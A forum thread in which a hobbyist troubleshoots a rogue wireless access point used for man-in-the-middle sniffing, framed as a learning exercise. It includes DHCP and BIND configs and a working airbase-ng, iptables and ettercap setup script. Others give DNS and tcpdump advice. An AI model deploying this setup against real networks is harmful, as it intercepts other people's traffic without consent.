rogue AP + MITM + DNS problems

[hitthemlow]

ID like to start by clarifying that I am doing this as a learning experience, I had it working fine by the tutorial in the howto section, but I am unsure on how to integrate a DNS server: here is the relevant files, my attempt at least.

/etc/dhcp3/dhcpd.conf

ddns-update-style none;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option domain-name-servers 10.0.0.1;
option routers 10.0.0.1;
default-lease-time 600;
max-lease-time 7200;
}

/etc/default/dhcp3-server - has the right interface specified

/etc/network/interfaces

auto lo eth1
iface eth1 inet dhcp
iface lo inet loopback

/etc/bind/named.conf.options

options {
directory "/var/cache/bind";
forwarders { 208.67.222.222; 208.67.220.220 };
auth-nxdomain no;
listen-on-v6 { any; };
};

The commands I have in a script to run:

kill `cat /var/run/dhcpd.pid`
killall -9 dhcp3-server dhcpd wireshark ettercap airbase-ng
airmon-ng stop eth1
ifconfig eth1 down
airmon-ng start eth1
airbase-ng -e "ESSID" -P -C 30 -v eth1
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
ettercap -T -q -p -i at0 // // &
sleep 8
echo "1" > /proc/sys/net/ipv4/ip_forward

See any problems? Could having dhcp, dns, airbase-ng, and ettercap be to much for this box?

[MaXe Legend]

What is it that doesn't work? If it's the DNS, don't you need more than those?

Usually it's a good idea to put the basic zones in it and of course all the needed
options, though i'm refering to ISC BIND which might be a bit different pal

Running all those together should work as we have talked about, but that's
just my opinion and i haven't played much with airbase-ng, though i have
played a lot with ISC BIND and Ettercap, and DHCP (on a winbl0wz server).

Well i did try to find the places where i found a lot of nice info on DNS servers, but i have forgotten them :-(
(i do have a nice and properly configured named.conf somewhere, that's for ISC BIND though )

[hitthemlow]

The DNS server is working, but the Tap interface isnt IE: Ettercap wont sniff the traffic now O.o

[MaXe Legend]

Since you're acting gateway, why not TCP-Dump it all?

Make sure when you test it, that there is actually traffic going through

[hitthemlow]

Ill try that, and yes I can figure the whole Make that there is traffic thing

[MaXe Legend]

Great, now when you TCP-Dump the traffic going through you, should i say
that you should double-check your dumping on the right interface acting router?

Just a heads up, i don't want to give false information. (though i'm not 100%
sure if the traffic just goes to you or on one specific interface since this case
involves multiple interfaces on One computer )

[hitthemlow]

Well its quite complex in the end

My computer has three interfaces (eth0, eth1, lo) and four ip addresses O.O

eth0 has an external IP given by the network Im leeching off of (my own in this case) it also has an internal IP for that LAN.
eth1 has the same external IP (everything gets forwarded) it also has its own internal IP (10.0.0.1).
lo has its own internal IP because it gets forwarded to eth1 as a client.

eth1 is acting as an access point, drawing from eth0. lo is connected to it via loopback. The dns server listens on every interface, but the only ones that will ask for a DNS request on 10.0.0.1, is the clients. Yet (!!) thanks to airbase, I also have a tap interface that everything gets forwarded through. O.O I should make a blueprint.

Thanks MaXe, it seems to be working.

[MaXe Legend]

Well its quite complex in the end

My computer has three interfaces (eth0, eth1, lo) and four ip addresses O.O

eth0 has an external IP given by the network Im leeching off of (my own in this case) it also has an internal IP for that LAN.
eth1 has the same external IP (everything gets forwarded) it also has its own internal IP (10.0.0.1).
lo has its own internal IP because it gets forwarded to eth1 as a client.

I got it to 5 IP's. eth0 has 2, eth1 has 2 and lo has 1? But four unique IP's in total. Insane xD

eth1 is acting as an access point, drawing from eth0. lo is connected to it via loopback. The dns server listens on every interface, but the only ones that will ask for a DNS request on 10.0.0.1, is the clients. Yet (!!) thanks to airbase, I also have a tap interface that everything gets forwarded through. O.O I should make a blueprint.

Yeah make a blueprint in MS Paint next time!

Thanks MaXe, it seems to be working.

Great to hear that man, i've been hoping for that for ages now!

[imported_onryo]

Hello MaXe,
I have a feeling 208.67.222.222; 208.67.220.220 is a copy past. You need to use your own ISP. Look up what they have.

Or you could try cat /etc/resolv.conf (guessing the IP to your router) and remove the above.

Or try using 4.2.2.2 as a DNS server. It is "free" and works well.

Could having dhcp, dns, airbase-ng, and ettercap be to much for this box?

Should not be a problem if you get everything set up right. I have 3 cards running in my computer. One as a rouge AP, one for rouge transparency and the last one for surfing etc. Using an old P4.

Best of luck with your endeavors

onryo

[Virchanza]

208.67.222.222 is a free public DNS server.

To confirm that it works from your location, do:

Code:

nslookup virjacode.com 208.67.222.222

(This tells nslookup to use 208.67.222.222 as the DNS server to look up virjacode.com)